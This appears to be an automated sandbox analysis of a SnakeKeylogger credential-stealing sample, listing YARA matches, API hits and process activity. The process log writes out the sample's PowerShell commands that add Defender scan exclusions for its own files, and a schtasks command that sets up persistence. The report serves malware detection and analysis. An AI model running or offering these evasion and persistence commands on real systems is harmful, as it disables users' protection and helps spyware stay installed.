Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: OtldpQxzAw.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wiSeRRwvZHTk.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, z--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, z--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, ioCwaGfdruCHidE4Gk.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, ioCwaGfdruCHidE4Gk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, ioCwaGfdruCHidE4Gk.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, ioCwaGfdruCHidE4Gk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, ioCwaGfdruCHidE4Gk.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, ioCwaGfdruCHidE4Gk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/20@3/4

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

File created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4524:120:WilError_03
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Mutant created: \Sessions\1\BaseNamedObjects\kQKfpoSPvmfDbvhxHl

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

File created: C:\Users\user\AppData\Local\Temp\tmp53CF.tmp

Jump to behavior

Source: OtldpQxzAw.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: OtldpQxzAw.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002D3D000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000334B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000338E000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003369000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000339B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000335B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: OtldpQxzAw.exe	Virustotal: Detection: 76%
Source: OtldpQxzAw.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

File read: C:\Users\user\Desktop\OtldpQxzAw.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"	Jump to behavior

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
